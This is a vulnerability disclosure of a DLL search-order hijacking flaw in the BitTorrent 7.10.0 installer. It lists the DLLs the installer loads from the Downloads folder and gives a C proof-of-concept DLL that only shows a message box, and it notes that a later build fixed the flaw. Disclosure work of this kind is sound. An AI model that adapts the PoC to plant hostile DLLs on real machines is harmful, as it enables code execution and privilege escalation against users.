Bittorrent 7.10.0 (Build 43581) Installer DLL Hijacking

`# Exploit Title: Bittorrent 7.10.0 (Build 43581) Installer DLL Search Order Hijack - "WININET.dll", "DNSAPI.dll", others  
# Date of Discovery: July 21 2017  
# Exploit Author: Rithwik Jayasimha  
# Author Homepage/Contact: https://thel3l.me  
# Vendor Name: Bittorrent Inc.  
# Vendor Homepage: https://www.bittorrent.com  
# Software Link: http://download-new.utorrent.com/endpoint/bittorrent/os/windows/track/stable/  
# Affected Versions: <=7.10.0.43581  
# Tested on: Windows 10, 8.1 x64  
# Category: local  
# Vulnerability type: Local Privilege Escalation/Code Execution  
  
  
# Description:  
  
  
Bittorrent versions <=7.10.0 Build 43581 automatically search for "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll", "bcrypt.dll" and "PHLPAPI.dll"  
among others from the installer download location.  
This allows a malicious attacker to potentially create these files in the directory resulting in them being run on installer execution.  
(code execution, local privilege escalation)  
C:\Users\<username>\Downloads\WININET.dll  
C:\Users\<username>\Downloads\msls31.dll  
C:\Users\<username>\Downloads\USP10.dll  
C:\Users\<username>\Downloads\CRYPTSP.dll  
C:\Users\<username>\Downloads\bcrypt.dll  
C:\Users\<username>\Downloads\PHLPAPI.dll  
  
  
# Proof Of Concept:  
1. Compile, place in vulnerable location and run bittorrent.exe  
  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
dll_hijack();  
return 0;  
}  
int dll_hijack()  
{  
MessageBox(0, "Bittorrent 7.10.0.43581 DLL Hijacking PoC", "DLL Message", MB_OK);  
return 0;  
}  
  
# Additional Notes, References and links:  
  
# Disclosure Timeline:  
This issue was remedied in BitTorrent 7.10.0 For Windows (build 43917)  
`